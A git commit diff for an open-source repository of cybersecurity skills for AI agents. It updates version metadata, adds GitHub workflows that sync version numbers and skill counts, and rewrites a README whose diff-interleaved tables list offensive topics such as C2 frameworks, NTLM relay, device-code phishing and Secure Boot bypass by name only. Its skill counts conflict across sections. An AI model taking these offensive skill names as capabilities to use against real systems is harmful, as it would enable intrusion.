chore: auto-update index.json and skill count

Add 55 new skills across 3 new domains + 6 undercovered areas (762 -> 817)
Demand-driven expansion targeting the fastest-growing 2025-2026 threat and skills categories (ISC2/WEF/CrowdStrike/Mandiant signals): - AI Security (NEW domain, 12 skills): LLM red-teaming with garak/PyRIT, prompt injection (direct/indirect/RAG), MCP tool-poisoning, agentic tool invocation, guardrails, model/data poisoning, system-prompt leakage, embedding/vector weaknesses, model extraction, continuous red-teaming - Supply Chain Security (NEW domain, 5 skills): SBOMs, dependency confusion, malicious-npm triage, typosquatting, SLSA/Sigstore provenance - Hardware & Firmware Security (NEW domain, 4 skills): CHIPSEC/UEFI audit, Secure Boot bypass, TPM measured-boot attestation, ESP bootkit hunting - Identity (10): Entra ID/ROADtools, GraphRunner, AADInternals, ADCS/Certipy, shadow credentials, coercion, BloodHound CE, device-code phishing, SSO abuse - Cloud-native (8): Stratus, Pacu, CloudFox, container escape, K8s RBAC, Falco, Trivy, kube-bench - Offensive C2 (6): Sliver, Havoc, NetExec, DPAPI, NTLM relay ESC8, redirectors - DFIR (6): Hayabusa, Chainsaw, KAPE, Velociraptor, EZ Tools, Plaso - Backfill (4): OpenCTI, MISP, honeytokens, post-quantum crypto migration Each skill follows the repo taxonomy (SKILL.md + references/{standards,api-reference}.md + scripts/agent.py + LICENSE), with researched real tool commands (no placeholders), complete frontmatter, and ATT&CK/ATLAS + NIST CSF mappings. Updates README domain table, skill count, and index.json.
2026-06-26 11:44:37 +03:00 · 2026-06-22 17:08:43 +00:00 · 2026-06-22 19:08:16 +02:00 · 2026-06-22 11:17:20 +00:00 · 2026-06-22 13:16:56 +02:00 · 2026-06-20 14:44:31 +00:00
1094 changed files with 66250 additions and 4269 deletions
@@ -5,15 +5,15 @@
    "email": "mukuljangra5@gmail.com"
  },
  "metadata": {
-    "description": "753 cybersecurity skills for AI agents and security practitioners covering web security, pentesting, forensics, threat intelligence, cloud security, and more.",
+    "description": "817 cybersecurity skills for AI agents mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework (F3).",
-    "version": "1.0.0"
+    "version": "1.2.0"
  },
  "plugins": [
    {
      "name": "cybersecurity-skills",
      "source": "./",
-      "description": "607+ cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
+      "description": "817 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more. Mapped to 6 frameworks.",
-      "version": "1.0.0",
+      "version": "1.2.0",
      "author": {
        "name": "mukul975"
      },
@@ -1,5 +1,5 @@
 {
  "name": "cybersecurity-skills",
-  "description": "753 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
+  "description": "817 cybersecurity skills covering web security, pentesting, DFIR, threat intelligence, cloud security, malware analysis, and more.",
-  "version": "1.0.0"
+  "version": "1.2.0"
 }
@@ -0,0 +1,43 @@
 name: Sync Marketplace Version on Release
 on:
  release:
    types: [published]
 jobs:
  sync-version:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.GITHUB_TOKEN }}
          ref: main
          fetch-depth: 0
      - name: Extract version from tag
        id: version
        run: |
          VERSION=${GITHUB_REF_NAME#v}
          echo "version=$VERSION" >> $GITHUB_OUTPUT
          echo "tag=$GITHUB_REF_NAME" >> $GITHUB_OUTPUT
      - name: Update marketplace.json and plugin.json version
        env:
          VERSION: ${{ steps.version.outputs.version }}
        run: |
          jq --arg v "$VERSION" '.metadata.version = $v | .plugins[].version = $v' .claude-plugin/marketplace.json > tmp.json
          mv tmp.json .claude-plugin/marketplace.json
          jq --arg v "$VERSION" '.version = $v' .claude-plugin/plugin.json > tmp.json
          mv tmp.json .claude-plugin/plugin.json
          echo "Updated marketplace.json and plugin.json to version $VERSION"
      - name: Commit and push
        run: |
          git config user.name "mukul975"
          git config user.email "mukuljangra5@gmail.com"
          git add .claude-plugin/marketplace.json .claude-plugin/plugin.json
          git diff --staged --quiet || git commit -m "chore: bump plugin version to ${{ steps.version.outputs.tag }}"
          git push origin HEAD:main
@@ -5,6 +5,8 @@ on:
    branches: [main]
    paths:
      - 'skills/**'
      - '.github/workflows/update-index.yml'
  workflow_dispatch:
 jobs:
  update-index:
@@ -19,7 +21,7 @@ jobs:
      - name: Regenerate index.json
        run: |
          python3 << 'EOF'
-          import os, json
+          import os, json, re
          from datetime import datetime, timezone
          skills_dir = "skills"
@@ -45,7 +47,7 @@ jobs:
              })
          index = {
-              "version": "1.0.0",
+              "version": "1.1.0",
              "generated_at": datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
              "repository": "https://github.com/mukul975/Anthropic-Cybersecurity-Skills",
              "domain": "cybersecurity",
@@ -59,10 +61,52 @@ jobs:
          print(f"Updated index.json: {len(skills)} skills")
          EOF
-      - name: Commit updated index
+      - name: Sync skill count into README and marketplace
        run: |
          python3 << 'EOF'
          import os, re, json
          # Authoritative count: directories under skills/ that contain a SKILL.md
          # and are not .bak backups (matches index.json generation above).
          count = 0
          for name in os.listdir("skills"):
              if name.endswith(".bak"):
                  continue
              if os.path.isfile(os.path.join("skills", name, "SKILL.md")):
                  count += 1
          print(f"Authoritative skill count: {count}")
          # README.md — replace the skills badge and every "<NNN> ... skills" phrase.
          with open("README.md", encoding="utf-8") as f:
              readme = f.read()
          readme = re.sub(r"(badge/skills-)\d+", rf"\g<1>{count}", readme)
          # "754 production-grade", "754 structured", "754 skills", "all 754 skills",
          # "Scans 754 skill", "contains **754 skills**", BibTeX "{754 structured"
          readme = re.sub(r"\b\d+(?=\s+production-grade cybersecurity skills)", str(count), readme)
          readme = re.sub(r"\b\d+(?=\s+structured cybersecurity skills)", str(count), readme)
          readme = re.sub(r"(all\s+)\d+(?=\s+skills)", rf"\g<1>{count}", readme)
          readme = re.sub(r"(Scans\s+)\d+(?=\s+skill\b)", rf"\g<1>{count}", readme)
          readme = re.sub(r"(contains\s+\*\*)\d+(?=\s+skills\*\*)", rf"\g<1>{count}", readme)
          readme = re.sub(r"(\{)\d+(?=\s+structured cybersecurity skills)", rf"\g<1>{count}", readme)
          with open("README.md", "w", encoding="utf-8") as f:
              f.write(readme)
          # marketplace.json + plugin.json — patch "<NNN> cybersecurity skills" in descriptions.
          for path in (".claude-plugin/marketplace.json", ".claude-plugin/plugin.json"):
              with open(path, encoding="utf-8") as f:
                  data = f.read()
              data = re.sub(r"\b\d+(?=\s+cybersecurity skills)", str(count), data)
              json.loads(data)  # fail loudly if the regex broke JSON
              with open(path, "w", encoding="utf-8") as f:
                  f.write(data)
          print("Synced skill count into README.md, marketplace.json, plugin.json")
          EOF
      - name: Commit updated index and skill count
        run: |
          git config user.name "mukul975"
          git config user.email "mukuljangra5@gmail.com"
-          git add index.json
+          git add index.json README.md .claude-plugin/marketplace.json .claude-plugin/plugin.json
-          git diff --staged --quiet || git commit -m "chore: auto-update index.json"
+          git diff --staged --quiet || git commit -m "chore: auto-update index.json and skill count"
          git push
@@ -467,6 +467,43 @@ To regenerate: `python3 extract_attack.py`
 ---
 ## MITRE ATLAS Coverage (v5.5.0)
 81 skills mapped to ATLAS adversarial ML techniques.
 Key techniques applied:
 - AML.T0051 — LLM Prompt Injection (Execution)
 - AML.T0054 — LLM Jailbreak (Privilege Escalation)
 - AML.T0088 — Generate Deepfakes (AI Attack Staging)
 - AML.T0010 — AI Supply Chain Compromise (Initial Access)
 - AML.T0020 — Poison Training Data (Resource Development)
 - AML.T0070 — RAG Poisoning (Persistence)
 - AML.T0080 — AI Agent Context Poisoning (Persistence)
 - AML.T0056 — Extract LLM System Prompt (Exfiltration)
 ## MITRE D3FEND Coverage (v1.3)
 11 skills mapped to D3FEND defensive countermeasures.
 Countermeasures applied span D3FEND tactical categories:
 Harden, Detect, Isolate, Deceive, Evict, Restore.
 Each skill's d3fend_techniques field lists the top 5 most relevant
 defensive countermeasures derived from the skill's ATT&CK technique tags.
 ## NIST AI RMF Coverage (AI 100-1)
 85 skills mapped to NIST AI Risk Management Framework subcategories.
 Core functions covered:
 - GOVERN: Organizational accountability for AI risk (GOVERN-1.1, GOVERN-6.1, GOVERN-6.2)
 - MAP: AI risk identification and context (MAP-5.1, MAP-5.2, MAP-1.6)
 - MEASURE: AI risk analysis and evaluation (MEASURE-2.5, MEASURE-2.7, MEASURE-2.8, MEASURE-2.11)
 - MANAGE: AI risk response and recovery (MANAGE-2.4, MANAGE-3.1)
 GenAI-specific subcategories applied: GOVERN-6.1, GOVERN-6.2 (responsible deployment policies).
 ---
 <p align="center">
  <sub>Part of <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills">Anthropic Cybersecurity Skills</a> — 753+ open-source cybersecurity skills for AI agents</sub>
 </p>
@@ -0,0 +1,32 @@
 cff-version: 1.2.0
 message: "If you use this repository in your research, tools, or publications, please cite it as below."
 type: software
 title: "Anthropic-Cybersecurity-Skills"
 abstract: >
  A structured collection of 753 cybersecurity skills for AI agents, covering
  penetration testing, digital forensics, threat intelligence, incident response,
  cloud security, OT/SCADA security, AI security, and more. Each skill follows
  a standardized format with YAML frontmatter metadata, step-by-step procedures,
  tool commands, expected outputs, and MITRE ATT&CK mappings. Compatible with
  Claude Code, GitHub Copilot, Cursor, Windsurf, Gemini CLI, and 20+ AI agent
  platforms.
 authors:
  - name: "Mahipal"
    email: mukuljangra5@gmail.com
    alias: mukul975
 repository-code: "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
 url: "https://github.com/mukul975/Anthropic-Cybersecurity-Skills"
 license: Apache-2.0
 version: "1.1.0"
 date-released: "2026-03-21"
 keywords:
  - cybersecurity
  - AI agents
  - skills
  - penetration testing
  - digital forensics
  - threat intelligence
  - incident response
  - MITRE ATT&CK
  - Claude Code
  - open source
@@ -1,589 +1,430 @@
 <p align="center">
-  <img src="assets/banner.png" alt="Anthropic Cybersecurity Skills — 734+ skills for AI agents" width="100%" />
+  <img src="assets/banner.png" alt="Anthropic Cybersecurity Skills" width="100%">
 </p>
-<p align="center">
+<div align="center">
  <a href="https://opensource.org/licenses/Apache-2.0"><img src="https://img.shields.io/badge/License-Apache_2.0-blue.svg?style=for-the-badge" alt="License: Apache 2.0" /></a>
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers"><img src="https://img.shields.io/github/stars/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="GitHub Stars" /></a>
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/network/members"><img src="https://img.shields.io/github/forks/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="GitHub Forks" /></a>
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/commits"><img src="https://img.shields.io/github/last-commit/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="Last Commit" /></a>
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills"><img src="https://img.shields.io/badge/Skills-734+-blueviolet?style=for-the-badge&logo=bookstack&logoColor=white" alt="734+ Skills" /></a>
  <a href="https://attack.mitre.org/"><img src="https://img.shields.io/badge/MITRE_ATT%26CK-Mapped-red?style=for-the-badge&logo=shield&logoColor=white" alt="MITRE ATT&CK Mapped" /></a>
  <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/graphs/contributors"><img src="https://img.shields.io/github/contributors/mukul975/Anthropic-Cybersecurity-Skills?style=for-the-badge&logo=github" alt="Contributors" /></a>
 </p>
-<p align="center">
+#  Anthropic Cybersecurity Skills
  <b>The largest open-source collection of cybersecurity skills for AI agents.<br/>734+ structured skills · MITRE ATT&CK mapped · NIST CSF 2.0 aligned · <a href="https://agentskills.io">agentskills.io</a> open standard</b>
 </p>
-<p align="center">
+### The largest open-source cybersecurity skills library for AI agents
-  <a href="https://mahipal.engineer/Anthropic-Cybersecurity-Skills/">🌐 Landing Page</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/releases/tag/v1.0.0">📦 v1.0.0 Release</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues">🐛 Report Bug</a> · <a href="https://github.com/mukul975/Anthropic-Cybersecurity-Skills/issues">💡 Request Feature</a>
+
-</p>
+[![GARS-2026 Survey](https://img.shields.io/badge/GARS--2026-Take%20the%20Survey-E8B84B?style=for-the-badge&logo=googleforms&logoColor=black)](https://mahipal.engineer/survey?utm_source=github_badge&utm_medium=readme&utm_campaign=gars2026)
 [![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg?style=flat-square)](LICENSE)
 [![Skills](https://img.shields.io/badge/skills-817-brightgreen?style=flat-square)](#whats-inside--29-security-domains)
 [![Frameworks](https://img.shields.io/badge/frameworks-6-orange?style=flat-square)](#six-frameworks-one-skill-library)
 [![MITRE F3](https://img.shields.io/badge/MITRE-F3_v1.1-blue?style=flat-square)](https://ctid.mitre.org/fraud/)
 [![Domains](https://img.shields.io/badge/domains-29-9cf?style=flat-square)](#whats-inside--29-security-domains)
 [![Platforms](https://img.shields.io/badge/platforms-26%2B-blueviolet?style=flat-square)](#compatible-platforms)
 [![GitHub stars](https://img.shields.io/github/stars/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/stargazers)
 [![GitHub forks](https://img.shields.io/github/forks/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/network/members)
 [![Last Commit](https://img.shields.io/github/last-commit/mukul975/Anthropic-Cybersecurity-Skills?style=flat-square)](https://github.com/mukul975/Anthropic-Cybersecurity-Skills/commits/main)
 [![agentskills.io](https://img.shields.io/badge/standard-agentskills.io-ff6600?style=flat-square)](https://agentskills.io)
 [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg?style=flat-square)](CONTRIBUTING.md)
 [![Playground](https://img.shields.io/badge/Playground-Casky.ai-blue)](https://casky.ai/?utm_source=github&utm_medium=readme&utm_campaign=cohort_launch#waitlist)
 [![Hermes Agent](https://img.shields.io/badge/Hermes_Agent-compatible-blueviolet?style=flat)](https://github.com/NousResearch/hermes-agent)
 **817 production-grade cybersecurity skills · 29 security domains · 6 framework mappings · 26+ AI platforms**
 [Get Started](#quick-start) · [What's Inside](#whats-inside--29-security-domains) · [Frameworks](#five-frameworks-one-skill-library) · [Platforms](#compatible-platforms) · [Contributing](#contributing)
 </div>
 ---
-Anthropic Cybersecurity Skills gives every AI agent — from Claude Code to GitHub Copilot to your custom LangChain pipeline — instant access to **734+ production-grade cybersecurity skills** spanning 26 security domains. Each skill follows the [agentskills.io](https://agentskills.io) open standard: a YAML frontmatter header for lightning-fast discovery, a structured Markdown body for step-by-step execution, and reference files for deep technical context. The entire collection is mapped to **MITRE ATT&CK** (all 14 Enterprise tactics, 200+ techniques) and aligned to **NIST CSF 2.0** — giving AI agents the same structured knowledge that senior security practitioners carry in their heads. Install in one command and your agent immediately knows how to perform memory forensics, hunt for C2 beaconing, audit Kubernetes RBAC, reverse .NET malware, and hundreds more tasks.
+> ⚠️ **Community Project** — This is an independent, community-created project. Not affiliated with Anthropic PBC. 
-## 📑 Table of contents
+## Give any AI agent the security skills of a senior analyst
- [🚀 Quick start](#-quick-start--install-cybersecurity-skills-for-ai-agents)
+A junior analyst knows which Volatility3 plugin to run on a suspicious memory dump, which Sigma rules catch Kerberoasting, and how to scope a cloud breach across three providers. **Your AI agent doesn't — unless you give it these skills.**
 - [🛡️ What's inside](#️-whats-inside--734-cybersecurity-skills-across-26-domains)
 - [🤖 Compatible platforms](#-compatible-ai-agent-platforms)
 - [📐 Skill structure](#-skill-structure-and-agentskillsio-format)
 - [🗺️ MITRE ATT&CK coverage](#️-mitre-attck-and-nist-csf-20-coverage)
 - [🧠 How AI agents use these skills](#-how-ai-agents-use-these-cybersecurity-skills)
 - [📝 Example skills](#-example-cybersecurity-skills)
 - [👥 Contributors](#-contributors)
 - [🤝 Contributing](#-contributing-to-cybersecurity-ai-skills)
 - [⭐ Star history](#-star-history)
 - [🌐 Community](#-community)
 - [📄 License](#-license)
---
+This repo contains **817 structured cybersecurity skills** spanning **29 security domains**, each following the [agentskills.io](https://agentskills.io) open standard.  Every skill is mapped to **six industry frameworks** — MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, MITRE D3FEND, NIST AI RMF, and the MITRE Fight Fraud Framework (F3) — making this the only open-source skills library with unified cross-framework coverage.  Clone it, point your agent at it, and your next security investigation gets expert-level guidance in seconds.
-## 🚀 Quick start — install cybersecurity skills for AI agents
+## Six frameworks, one skill library
-Get up and running in under 30 seconds. Choose your preferred method:
+No other open-source skills library maps every skill to all of these frameworks.  One skill, six compliance checkboxes. 
-### Option 1 · npx (recommended)
+| Framework | Version | Scope in this repo | What it maps |
 |---|---|---|---|
 | [MITRE ATT&CK](https://attack.mitre.org) | v19.1 | 15 tactics · 286 techniques | Adversary behaviors and TTPs |
 | [NIST CSF 2.0](https://www.nist.gov/cyberframework) | 2.0 | 6 functions · 22 categories | Organizational security posture |
 | [MITRE ATLAS](https://atlas.mitre.org) | v5.4 | 16 tactics · 84 techniques | AI/ML adversarial threats |
 | [MITRE D3FEND](https://d3fend.mitre.org) | v1.3 | 7 categories · 267 techniques | Defensive countermeasures |
 | [NIST AI RMF](https://airc.nist.gov/AI_RMF) | 1.0 | 4 functions · 72 subcategories | AI risk management |
 | [MITRE F3 (Fight Fraud Framework)](https://ctid.mitre.org/fraud/) | v1.1 (2026-04-09) | 8 tactics · 123 techniques · 94 fraud-relevant skills | Cyber-enabled financial fraud TTPs |
 **Example — a single skill maps across all six:**
 | Skill | ATT&CK | NIST CSF | ATLAS | D3FEND | AI RMF | F3 |
 |---|---|---|---|---|---|---|
 | `analyzing-network-traffic-of-malware` | T1071 | DE.CM | AML.T0047 | D3-NTA | MEASURE-2.6 | — |
 | `detecting-business-email-compromise` | T1566 | DE.AE | — | — | — | F1005.006 · monetization |
 ### 🆕 MITRE Fight Fraud Framework (F3) — 94 fraud-relevant skills
 [![MITRE F3](https://img.shields.io/badge/MITRE-F3_v1.1-blue?style=flat-square)](https://ctid.mitre.org/fraud/)
 The **[MITRE Fight Fraud Framework (F3)](https://ctid.mitre.org/fraud/)** was released **April 9, 2026** by MITRE's Center for Threat-Informed Defense (CTID), co-developed with JPMorganChase, Citigroup, Lloyds Banking Group, Standard Chartered, CrowdStrike, Verizon Business, FS-ISAC, and others. It is an ATT&CK-compatible TTP catalog for **cyber-enabled financial fraud** — filling the gap ATT&CK leaves after initial compromise.
 F3 v1.1 adds **two fraud-specific tactics** that ATT&CK does not enumerate:
 - **Positioning** (`FA0001`) — actions taken after access to collect/manipulate data and prepare the fraud (synthetic-identity seeding, account warming, beneficiary setup, SIM-swap pre-positioning, banking-session hijack).
 - **Monetization** (`FA0002`) — converting stolen assets into usable funds (money-mule layering, APP fraud, crypto off-ramping, card cash-out, refund/chargeback abuse).
 Fraud-specific techniques use `F1XXX` IDs (e.g. `F1005.003` Add Beneficiary, `F1025.003` Wire Transfer, `F1007` Adversary-in-the-Browser); reused ATT&CK techniques keep their `T1XXX` IDs. Mappings live in each skill's `mitre_f3:` frontmatter block — all 123 F3 v1.1 technique IDs were verified against the upstream STIX bundle. See [`docs/mitre-f3-mapping.md`](docs/mitre-f3-mapping.md) for the schema.
 ### MITRE ATT&CK v19.1 — 754/754 skills mapped
 Every skill carries a `mitre_attack` frontmatter list validated against **MITRE ATT&CK v19.1** (the latest release) using the official `mitreattack-python` library — 286 distinct techniques across all 15 Enterprise tactics, plus ICS and Mobile techniques where relevant. Zero revoked or deprecated IDs. v19.1's restructured Defense Evasion (now split into **Stealth** and **Defense Impairment**) is reflected below.
 | Tactic | ID | Skills |
 |--------|----|--------|
 | Reconnaissance | TA0043 | 103 |
 | Resource Development | TA0042 | 22 |
 | Initial Access | TA0001 | 467 |
 | Execution | TA0002 | 350 |
 | Persistence | TA0003 | 444 |
 | Privilege Escalation | TA0004 | 464 |
 | Stealth | TA0005 | 442 |
 | Defense Impairment | TA0112 | 92 |
 | Credential Access | TA0006 | 202 |
 | Discovery | TA0007 | 237 |
 | Lateral Movement | TA0008 | 68 |
 | Collection | TA0009 | 172 |
 | Command and Control | TA0011 | 123 |
 | Exfiltration | TA0010 | 82 |
 | Impact | TA0040 | 50 |
 ## Quick start
 ```bash
 # Option 1: npx (recommended)
 npx skills add mukul975/Anthropic-Cybersecurity-Skills
 ```
-### Option 2 · Claude Code plugin marketplace
+# Option 2: Git clone
 ```
 /plugin marketplace add mukul975/Anthropic-Cybersecurity-Skills
 ```
 ### Option 3 · Manual clone
 ```bash
 git clone https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
 cd Anthropic-Cybersecurity-Skills
 ```
-> **That's it.** Your AI agent can now discover and execute 734+ cybersecurity skills on demand. No configuration, no API keys, no setup scripts.
+Works immediately with Claude Code, GitHub Copilot, OpenAI Codex CLI, Cursor, Gemini CLI, and any [agentskills.io](https://agentskills.io)-compatible platform. 
---
+## 🌍 GARS-2026 — Global Agentic AI Readiness Survey
-## 🛡️ What's inside — 734+ cybersecurity skills across 26 domains
+I'm running a global academic study measuring how ready security professionals,
 developers, and enterprise teams actually are for agentic AI — MCP servers,
 tool calling, governance, and human-in-the-loop workflows.
-Every skill is a self-contained directory with structured workflows, reference materials, helper scripts, and validation steps. Here are the top 16 domains:
+**If you use this repo, your response would be a genuinely valuable data point.**
-| Domain | Skills | Example capabilities |
+📋 **Take the survey (10 min):**
-|:-------|:------:|:---------------------|
+[Survey Link](https://mahipal.engineer/survey?utm_source=github_repo&utm_medium=readme&utm_campaign=gars2026)
 | ☁️ **Cloud Security** | **48** | AWS S3 bucket audit, Azure AD config review, GCP IAM assessment |
 | 🌐 **Web Application Security** | **45** | HTTP request smuggling, XSS with Burp Suite, web cache poisoning |
 | 🔌 **Network Security** | **41** | Wireshark traffic analysis, VLAN segmentation, Suricata IDS tuning |
 | 🎯 **Penetration Testing** | **38** | Active Directory exploitation, OSCP-style methodology, pivoting |
 | 🔴 **Red Teaming** | **35** | Cobalt Strike operations, LOTL techniques, evasion & persistence |
 | 🔍 **DFIR** | **32** | Disk imaging, memory forensics with Volatility3, browser forensics |
 | 🦠 **Malware Analysis** | **28** | Ghidra reverse engineering, YARA rules, .NET decompilation |
 | 📡 **Threat Intelligence** | **26** | APT group analysis with MITRE Navigator, campaign attribution |
 | ☸️ **Cloud Native / Kubernetes** | **24** | etcd security assessment, pod security policies, RBAC audit |
 | 📋 **Compliance & Governance** | **22** | PCI DSS scoping, SOC 2 readiness, GDPR data mapping |
 | 🔑 **IAM Security** | **20** | SAML SSO with Okta, PAM deployment, service account hardening |
 | 🔐 **Cryptography** | **18** | TLS configuration audit, certificate lifecycle, key management |
 | 🏰 **Zero Trust** | **16** | Microsegmentation, BeyondCorp implementation, continuous verification |
 | 🏭 **OT / ICS Security** | **14** | SCADA monitoring, Modbus anomaly detection, Purdue model |
 | 🔧 **DevSecOps** | **12** | Pipeline security gates, SAST/DAST integration, IaC scanning |
 | 🕵️ **OSINT** | **15** | Domain reconnaissance, social engineering recon, dark web monitoring |
 | ➕ **Additional domains (10+)** | **300+** | SOC operations, API security, endpoint security, phishing defense, ransomware defense, mobile security, deception technology, and more |
 | | **734+** | **Total skills across 26 domains** |
---
+- 60 questions · Anonymous · Supervised by SRH Berlin
 - You get **50 Casky Tokens** for early access to [casky.ai](https://casky.ai)
 - Results published open access under CC-BY 4.0
-## 🤖 Compatible AI agent platforms
+## 🚀 Try it on the Playground
-Skills follow the [agentskills.io](https://agentskills.io) open standard — **write once, use everywhere**. Any platform that reads `SKILL.md` files with YAML frontmatter works out of the box.
+Experience Casky.ai hands-on — no setup required.
-### AI code assistants
+**[→ Launch Playground on Casky.ai](https://casky.ai/?utm_source=github&utm_medium=readme&utm_campaign=cohort_launch#waitlist)**
-| Platform | Status | Install method |
+The playground lets you:
-|:---------|:------:|:---------------|
+- Run live cybersecurity skill exercises against real targets
-| **Claude Code** (Anthropic) | ✅ | `/plugin marketplace add mukul975/Anthropic-Cybersecurity-Skills` |
+- See AI agents execute structured skills in real time
-| **GitHub Copilot** (Microsoft) | ✅ | Place in `.github/skills` directory |
+- Explore MITRE ATT&CK mapped workflows interactively
-| **Cursor** | ✅ | `npx skills add` or manual clone |
+- Test threat hunting, DFIR, and penetration testing scenarios
 | **Windsurf** | ✅ | `npx skills add` or manual clone |
 | **Cline** | ✅ | `npx skills add` or manual clone |
 | **Aider** | ✅ | `npx skills add` or manual clone |
 | **Continue** | ✅ | `npx skills add` or manual clone |
 | **Roo Code** | ✅ | `npx skills add` or manual clone |
 | **Amazon Q Developer** | ✅ | `npx skills add` or manual clone |
 | **Tabnine** | ✅ | `npx skills add` or manual clone |
 | **Sourcegraph Cody** | ✅ | `npx skills add` or manual clone |
 | **JetBrains AI** | ✅ | `npx skills add` or manual clone |
-### CLI agents
+No installation. No configuration. Just open and start.
 ## Why this exists
-| Platform | Status | Install method |
+The cybersecurity workforce gap hit **4.8 million unfilled roles** globally in 2024 (ISC2). AI agents can help close that gap — but only if they have structured domain knowledge to work from. Today's agents can write code and search the web, but they lack the practitioner playbooks that turn a generic LLM into a capable security analyst.
 |:---------|:------:|:---------------|
 | **OpenAI Codex CLI** | ✅ | `npx skills add` — reads from `~/.codex/skills` |
 | **Gemini CLI** (Google) | ✅ | `npx skills add` or manual clone |
-### Autonomous agents
+Existing security tool repos give you wordlists, payloads, or exploit code. None of them give an AI agent the structured decision-making workflow a senior analyst follows: when to use each technique, what prerequisites to check, how to execute step-by-step, and how to verify results. That is the gap this project fills.
-| Platform | Status | Install method |
+**Anthropic Cybersecurity Skills** is not a collection of scripts or checklists. It is an **AI-native knowledge base** built from the ground up for the agentskills.io standard  — YAML frontmatter for sub-second discovery, structured Markdown for step-by-step execution, and reference files for deep technical context.  Every skill encodes real practitioner workflows, not generated summaries. 
 |:---------|:------:|:---------------|
 | **Devin** | ✅ | Point to cloned skill directory |
 | **Replit Agent** | ✅ | Import via repo URL |
 | **SWE-agent** | ✅ | Mount skill directory |
 | **OpenHands** | ✅ | Mount skill directory |
-### Agent frameworks & SDKs
+## What's inside — 29 security domains
-| Platform | Status | Install method |
+| Domain | Skills | Key capabilities |
-|:---------|:------:|:---------------|
+|---|---|---|
-| **LangChain** | ✅ | Load `SKILL.md` files as tool descriptions |
+| Cloud Security | 66 | AWS, Azure, GCP hardening · CSPM · cloud attack emulation · cloud forensics |
-| **CrewAI** | ✅ | Load as agent knowledge base |
+| Threat Hunting | 58 | Hypothesis-driven hunts · LOTL detection · EVTX hunting · fleet hunting |
-| **AutoGen** | ✅ | Load as agent knowledge base |
+| Threat Intelligence | 52 | STIX/TAXII · MISP · OpenCTI · feed integration · actor profiling |
-| **Semantic Kernel** | ✅ | Load as plugins |
+| Network Security | 43 | IDS/IPS · firewall rules · VLAN segmentation · traffic analysis |
-| **Haystack** | ✅ | Ingest via document store |
+| Web Application Security | 42 | OWASP Top 10 · SQLi · XSS · SSRF · deserialization |
-| **Vercel AI SDK** | ✅ | Load as tool definitions |
+| Digital Forensics | 41 | Disk imaging · memory forensics · Hayabusa/KAPE/Plaso timelines |
-| **Any MCP-compatible agent** | ✅ | Via MCP tool integration |
+| Malware Analysis | 39 | Static/dynamic analysis · reverse engineering · sandboxing |
 | Identity & Access Management | 37 | Entra ID/ROADtools · device-code phishing · PAM · zero trust identity |
 | SOC Operations | 35 | Playbooks · escalation workflows · Graph-log detection · tabletop exercises |
 | Red Teaming | 33 | ADCS/Certipy · BloodHound CE · Sliver/Havoc C2 · NTLM relay |
 | Container Security | 33 | K8s RBAC · image scanning · Falco · container escape |
 | Security Operations | 28 | SIEM correlation · log analysis · alert triage |
 | OT/ICS Security | 28 | Modbus · DNP3 · IEC 62443 · historian defense · SCADA |
 | API Security | 28 | GraphQL · REST · OWASP API Top 10 · WAF bypass |
 | Incident Response | 26 | Breach containment · ransomware response · IR playbooks |
 | Vulnerability Management | 25 | Nessus · scanning workflows · patch prioritization · CVSS |
 | Penetration Testing | 21 | Network · web · cloud · mobile · NetExec lateral movement |
 | DevSecOps | 18 | CI/CD security · Trivy IaC/image scanning · code signing |
 | Zero Trust Architecture | 17 | BeyondCorp · CISA maturity model · microsegmentation |
 | Endpoint Security | 17 | EDR · LOTL detection · fileless malware · persistence hunting |
 | Cryptography | 16 | TLS · Ed25519 · post-quantum migration · key management |
 | Phishing Defense | 15 | Email authentication · BEC detection · phishing IR |
 | AI Security | 14 | LLM red-teaming (garak/PyRIT) · prompt injection · MCP/agentic security · guardrails |
 | Mobile Security | 13 | Android/iOS analysis · mobile pentesting · MDM forensics |
 | Ransomware Defense | 13 | Precursor detection · response · recovery · encryption analysis |
 | Compliance & Governance | 9 | NIST 800-30/RMF · CMMC · HIPAA · TPRM · CIS benchmarks |
 | Supply Chain Security | 8 | SBOMs · dependency confusion · malicious-package triage · SLSA/Sigstore |
 | Deception Technology | 6 | Honeytokens · canarytokens · breach detection |
 | Hardware & Firmware Security | 4 | CHIPSEC/UEFI audit · Secure Boot bypass · TPM attestation · bootkit hunting |
---
+## How AI agents use these skills
-## 📐 Skill structure and agentskills.io format
+Each skill costs **~30 tokens to scan** (frontmatter only)  and **500–2,000 tokens to fully load** (complete workflow). This progressive disclosure architecture lets agents search all 817 skills in a single pass without blowing context windows. 
-Every skill lives in its own directory under `skills/` and follows a consistent structure:
+```
 User prompt: "Analyze this memory dump for signs of credential theft"
 Agent's internal process:
  1. Scans 817 skill frontmatters (~30 tokens each)
     → identifies 12 relevant skills by matching tags, description, domain
